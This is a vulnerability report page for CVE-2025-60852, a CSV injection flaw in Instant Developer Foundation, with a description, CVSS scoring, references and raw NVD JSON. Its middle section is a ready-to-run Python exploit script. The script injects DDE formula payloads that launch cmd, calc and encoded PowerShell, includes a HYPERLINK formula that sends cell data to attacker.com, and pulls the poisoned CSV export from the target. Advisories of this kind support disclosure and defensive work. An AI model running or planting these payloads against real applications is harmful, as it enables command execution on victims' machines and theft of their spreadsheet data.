Security Vulnerability Report
CVE-2025-60852 CVSS 6.5 MEDIUM

CVE-2025-60852

Published: 2025-10-23 14:15:42
Last Modified: 2026-04-15 00:35:42

Description

A CSV Injection vulnerability existed in Instant Developer Foundation versions prior to 25.0.9600. Applications built with affected versions of the framework did not properly sanitize user-controlled input before including it in CSV exports. This issue could lead to code execution on the system where the exported CSV file is opened.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Instant Developer Foundation < 25.0.9600

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60852 CSV Injection PoC
# Affected: Instant Developer Foundation < 25.0.9600
import requests
import json

# Step 1: Inject malicious formula via user input field
target_url = "http://target-app.com/export_form.php"

# Malicious CSV formula payloads
payloads = [
    "=cmd|' /C calc'!A0",  # Windows RCE via DDE
    "=HYPERLINK(\"http://attacker.com/steal?data=\"&A1)",  # Data exfiltration
    "+cmd|' /C notepad'!A0",  # Alternative RCE syntax
    "-1+cmd|' /C powershell -enc base64... '!A0",  # PowerShell execution
]

# Inject payload through vulnerable input field
for payload in payloads:
    data = {
        "username": payload,
        "email": "[email protected]",
        "description": "Test input for CSV injection"
    }
    response = requests.post(target_url, data=data)
    print(f"Payload sent: {payload}")
    print(f"Response: {response.status_code}")

# Step 2: Export CSV file containing malicious formula
csv_export_url = "http://target-app.com/export_csv.php"
csv_response = requests.get(csv_export_url)

if csv_response.status_code == 200:
    with open("malicious_export.csv", "wb") as f:
        f.write(csv_response.content)
    print("Malicious CSV file saved: malicious_export.csv")
    print("Content preview:")
    print(csv_response.text[:500])

# Step 3: When victim opens CSV in Excel, formula executes
print("\n[!] Victim must open CSV and click 'Yes' to formula warning")

References

https://doc.instantdeveloper.com/eng/default.aspx?artid=a6c69034-d1ee-4057-b19d-40505151ec8e&lang=eng
https://github.com/valeriocassoni/CSV-Injection-in-Instant-Developer-Foundation-25.0-PoC
https://instantdeveloper.com/lp/cloud-freelance/index.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60852", "sourceIdentifier": "[email protected]", "published": "2025-10-23T14:15:42.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CSV Injection vulnerability existed in Instant Developer Foundation versions prior to 25.0.9600. Applications built with affected versions of the framework did not properly sanitize user-controlled input before including it in CSV exports. This issue could lead to code execution on the system where the exported CSV file is opened."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://doc.instantdeveloper.com/eng/default.aspx?artid=a6c69034-d1ee-4057-b19d-40505151ec8e&lang=eng", "source": "[email protected]"}, {"url": "https://github.com/valeriocassoni/CSV-Injection-in-Instant-Developer-Foundation-25.0-PoC", "source": "[email protected]"}, {"url": "https://instantdeveloper.com/lp/cloud-freelance/index.html", "source": "[email protected]"}]}}